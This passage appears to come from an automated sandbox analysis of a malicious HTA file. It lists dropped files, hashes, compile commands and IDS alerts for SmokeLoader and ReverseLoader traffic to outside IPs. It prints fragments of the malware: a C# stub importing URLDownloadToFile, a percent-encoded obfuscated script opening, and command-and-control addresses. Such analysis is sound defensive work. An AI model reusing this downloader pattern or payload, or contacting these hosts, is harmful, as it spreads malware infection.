                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Jan 8 12:05:21 2025, 1st section name ".debug$S"
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1328
                                                                                                                                                                                                            Entropy (8bit):3.984349037776297
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:HQe9E2+fpigjXDfH9fwKEbsmfII+ycuZhNarakSFEPNnqSqd:OpigjzSKPmg1ulma3yqSK
                                                                                                                                                                                                            MD5:9EB53ECDEF6DCAB92413B86113FD2733
                                                                                                                                                                                                            SHA1:D970310046A84CCD8E0CF211D51F62DC9FF5405D
                                                                                                                                                                                                            SHA-256:E51AC1749C79022A347930FAAE3E9BBBB84E267FAF48DF3FAFE87A32B99FD4D5
                                                                                                                                                                                                            SHA-512:D4876EFA65B686ECBC93EC247642C4B181599CCDD17B37D94F52C8D8F5239A8639D154D330109B372BD1CAE18DF231AC7D626D341B9E95793ECE0FCF6F89F639
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:L....j~g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP.................kp...O.Y..C...........4.......C:\Users\user\AppData\Local\Temp\RES2316.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.h.j.2.b.m.0.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                                            Entropy (8bit):3.0951232474795463
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysrak7YnqqFEPN5Dlq5J:+RI+ycuZhNarakSFEPNnqX
                                                                                                                                                                                                            MD5:0DD06B708B091E4FEB5917F19843E9AC
                                                                                                                                                                                                            SHA1:EE66CFBC0B55777FD6386432F7EC6121A4F00375
                                                                                                                                                                                                            SHA-256:650B759DA76B3336435ADEC9AC382D537D50606B276BA6C31D956221C0D0F980
                                                                                                                                                                                                            SHA-512:A8F36B3BD51B1A65F512D984C74294E922245853B114D88F1093FFAB2D9875C833C702BC1900E93159BB284ACB8BC47F15EFFBA4BC182D46A71E0A5434428A76
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.h.j.2.b.m.0.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.h.j.2.b.m.0.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):478
                                                                                                                                                                                                            Entropy (8bit):3.72824635699777
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:V/DsYLDS81zukLU3FdMGHQXReKJ8SRHy4HDFmQyC7m0NewdKy:V/DTLDfueCKXfHt1Cy
                                                                                                                                                                                                            MD5:7836723690E40C9D8FBF78FBD248C066
                                                                                                                                                                                                            SHA1:6A0F9FB57575624AD9CA54108ABB75CB6B20FD3D
                                                                                                                                                                                                            SHA-256:A1DD056C3C937DD2FEF8D026745F706DA97F13205FEBA1BDAE492D4B2CAD07A9
                                                                                                                                                                                                            SHA-512:10C093F3AAEF531E31196AFCC50FE7D554EEE7D49206046F0D0A6DD86F23CE73067A7B926B6ACAC810A5D33ECC98B605B1FF1E6EAF0D404A4C1D9265F8AC06A3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace NsDHjxA.{. public class x. {. [DllImport("urlmON.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr uqxAu,string gHWgkmN,string mtZIYqXIBh,uint Q,IntPtr jtRl);.. }..}.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):369
                                                                                                                                                                                                            Entropy (8bit):5.25973014987794
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fxtxqzxs7+AEszIwkn23fxtxPn:p37Lvkmb6KRfptxqWZEifptxPn
                                                                                                                                                                                                            MD5:192813CD571446B3D77120F5DB17CD91
                                                                                                                                                                                                            SHA1:5C7E9B74FFEA4C4AAEEA84484432609A4D96CD5D
                                                                                                                                                                                                            SHA-256:85EAABA4C1E89005DEF13C6B2749FD71D4F6017F85101E7055F0DD7A1DFBA1FC
                                                                                                                                                                                                            SHA-512:388C75287127DCF11D2A4FC810202D3C5FF429530353A1E599CF68FA43BC4FE4E3748EF5A7BB25D4333DB9D68AAA1825682A1F6BB0AC8DC72B325A0588555B02
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.0.cs"
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3072
                                                                                                                                                                                                            Entropy (8bit):2.814771807632319
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:etGSuPBu5exl8qZ/k/YyUPrytkZfq74HrjcUWI+ycuZhNarakSFEPNnq:6tsx+qvyUPZJq7WA31ulma3yq
                                                                                                                                                                                                            MD5:0D55E0D2BEB3C691C78B52986B205916
                                                                                                                                                                                                            SHA1:91419B951B46BB45019F7B8CEFCBFC638CA1D485
                                                                                                                                                                                                            SHA-256:EB764FD412DA9F5563B15E9F338332E53B05D7F53DF4A625ADC5683DCEDFDCF0
                                                                                                                                                                                                            SHA-512:05AF2843ED2BD2D51C805D1BE1B0C4766874F6D30623FB0E2EFC7617F15A04FB87788CB7D8916A5029EFDFAB5807FBC8191FF617DAF3CC4AA3AAA6B8549F2414
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j~g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................1.*.....p.....p.......................................... 8.....P ......J.........P.....V.....^.....i.....k...J.....J...!.J.....J.......!.....*.......8.......................................!..........<Module>.th
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):867
                                                                                                                                                                                                            Entropy (8bit):5.320605481681496
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:KJBqd3ka6KRfptxLEifptx2Kax5DqBVKVrdFAMBJTH:Cika6CpLLEupL2K2DcVKdBJj
                                                                                                                                                                                                            MD5:E0D21611AAEFDAC4AE9668EE82553FD9
                                                                                                                                                                                                            SHA1:5645149A5D47DD29E3520A31F0AC7F6C95BB1173
                                                                                                                                                                                                            SHA-256:ED05F6974F5DF7B57CB3564595F84E8D788B0AF0C92A8052C7A7D03A761F749B
                                                                                                                                                                                                            SHA-512:15DD2D4FB6103FEAA0B928CE5885FAE506183DDA027F07B36F668A34A568400E680E6C32475996600489314971D9CE3BEFF2C35076F3537DE30F5F2796E27A25
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):339146
                                                                                                                                                                                                            Entropy (8bit):7.999445085868727
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:6144:XjiOywhhl3rDOvFFhfjw+KllDuFkrQGxXy3O9PD7E9goOb:XJXWtc+elDIkrQGjt7ENOb
                                                                                                                                                                                                            MD5:9B968C019240321E16C0ECEC287370E1
                                                                                                                                                                                                            SHA1:0A37661DAFB4F153EB994B36446AD06007759570
                                                                                                                                                                                                            SHA-256:92CB933291A22AF5ADCF18CC2EB1D096A7E3232774EC6066450F61357C57B5AD
                                                                                                                                                                                                            SHA-512:2D981855BF9AEC392421C7D2AAEE025D2560688957E637C4D6411096D5DF5C5F471B6B037FF0D8851DDF4B7112A74FB0E0859E593A8FB43CD9C52CC81723C984
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:'..k..=ze|C.........;..].7..".(.S...7W..i...s2XT..K.4.....A...k.){..0W..A......).s..N>zm.=j...../.b...x]...H..<..."....Hp....'o..j=qn..O...V}.4.....].Kc...........$..".X,)_..t....."..Q......iz...r..,..y...h.V..o.....c...*...7..Sz.....UM#....f..Z.....@3.;.....2.U}Y..2..\eKG..xN[.../L.....+2\.o.w4RK..{}(..S#..4...t...`{.\..P......I.b%%D....../.8`.o.3..mb).Dye.h..:.X.Y..B..z..s...i...,kg-.pL..H.?.p.D..0....7<........r...yC46./.X...i.M.w.{.2..g)n.c..r=...(.....8.Q.. 2y.^....Af.!..8.[1.x..H.lN..y..KX.].t......h"{@E..S6..Zy....7Ur7e....Y...q...0.M..Z..,.31.....|n.J-.".^".......;_.F........G..8K.kP......+{.......7....F}A`.2=...W...*~!....iS..=.(.&}T..nP...E.. .A.7...........}m.....:q..p&F.S/T...1[.w.....D..2F..{.........bu.9..^.HM:c!......=....M...y..<..K......W....[...&....*.eN...).V.......)>..0....C<p..5&.u.I........\._...U......o...]..?...$..K..{_.qc.]. .?.<Q....9...#..>...e..x2;....U....(.3`...D.X.......4r.9.._.Bj.u(.\Q.D..TtW..gPO..K.Kn..X..
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):56368
                                                                                                                                                                                                            Entropy (8bit):6.120994357619221
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
                                                                                                                                                                                                            MD5:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                            SHA1:19DFD86294C4A525BA21C6AF77681B2A9BBECB55
                                                                                                                                                                                                            SHA-256:99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
                                                                                                                                                                                                            SHA-512:94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: invoice727282_PDF..exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: 6038732).vbs, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: cirby0J3LP.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (12085), with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):224763
                                                                                                                                                                                                            Entropy (8bit):5.3949239509459925
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:A8gVmI3b0mgfmWu+ke9VOv5iG5sVhQ30Wk+70wgA1A:A8gVxe9VOvM
                                                                                                                                                                                                            MD5:8CCD875893CD23B67D7C61EA735F5C52
                                                                                                                                                                                                            SHA1:6171C7DD4F67A67FFF0CA151C7E9A06104E00DEF
                                                                                                                                                                                                            SHA-256:16328212055D6AA79C45B6624607F74B732B159DB4C6CDF7D8E6835EBDC6E392
                                                                                                                                                                                                            SHA-512:3CEB06944FB1CB3F176E9163F761E3C2D97E72A9E0177F417D4A83E03F4B539FBCB2D7EBE53865A483CACDC8EAF16CE292245AED1CC60C207F7CA038CED07F31
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\icgfugf
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):221
                                                                                                                                                                                                            Entropy (8bit):4.801526423190794
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:zx3Me21f1LRJIQtAMw/VgRZBXVN+1GFJqozrCib:zKpj1JIUwqBFN+1Q3b
                                                                                                                                                                                                            MD5:A3DCA41A950A7DF7ECE76A867A17400E
                                                                                                                                                                                                            SHA1:AA9EFDBCF37BEE2C7FD0986F1A4308A73EC3F7BB
                                                                                                                                                                                                            SHA-256:6B2BE177016DF867316A0C432DAB0B71B6E51B35D169B0ACB1ABB47A4C03D7C0
                                                                                                                                                                                                            SHA-512:F80207B5B78C7AE867AAB139196BBBEDE0437961DD03E790AEF3B877A228D7A90B9178B3342324B0EEA1C270E2A232A769B2F2D9E5DB4C065EB95140FA12239D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:Microsoft (R) ASP.NET Compilation Tool version 4.8.4084.0..Utility to precompile an ASP.NET application..Copyright (C) Microsoft Corporation. All rights reserved.....Run 'aspnet_compiler -?' for a list of valid options...
                                                                                                                                                                                                            File type:HTML document, ASCII text, with very long lines (65505), with CRLF line terminators
                                                                                                                                                                                                            Entropy (8bit):3.218143319124101
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • HyperText Markup Language (13008/1) 61.90%
                                                                                                                                                                                                            • HTML Application (8008/1) 38.10%
                                                                                                                                                                                                            File name:begoodforeverythinggreatthingsformebetterforgood.hta
                                                                                                                                                                                                            File size:110'765 bytes
                                                                                                                                                                                                            MD5:b7bd51ea4a3cbb85901f5e467009beaa
                                                                                                                                                                                                            SHA1:2daa4cd4c7eca9c42ff00e7d1a4e027f55b836bc
                                                                                                                                                                                                            SHA256:4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073
                                                                                                                                                                                                            SHA512:0d30af8454e5a74674e4f971e40a7c7781d0c29d48c25dd327b7bccad07f6208db24a078d8e03c07ae2bac7ac3ceba01b67668f7b3108456406c7a258fced032
                                                                                                                                                                                                            SSDEEP:384:Fipci1dZ2FGFZrZi9qiA/zRj6TiezFSw4M7333j333V333x333kD333n33P333UM:zFLFSwkGpe1zOhVadsRZ4
                                                                                                                                                                                                            TLSH:CDB36BFA5442E0BAE5DBC6BFFC9C2DA415009F27DDE85F4515EC880D6BE82C63124AC9
                                                                                                                                                                                                            File Content Preview:<script>.. ..(function() {.. var d = unescape("%36%36%31%37%39%62%64%30%32%31%31%62%63%63%39%39%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2025-01-08T11:08:59.528574+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.449733192.3.27.14480TCP
                                                                                                                                                                                                            2025-01-08T11:09:49.834350+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974446.173.214.1480TCP
                                                                                                                                                                                                            2025-01-08T11:09:50.092954+01002829848ETPRO MALWARE SmokeLoader encrypted module (3)246.173.214.1480192.168.2.449744TCP
                                                                                                                                                                                                            2025-01-08T11:09:54.445641+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974646.173.214.1480TCP
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
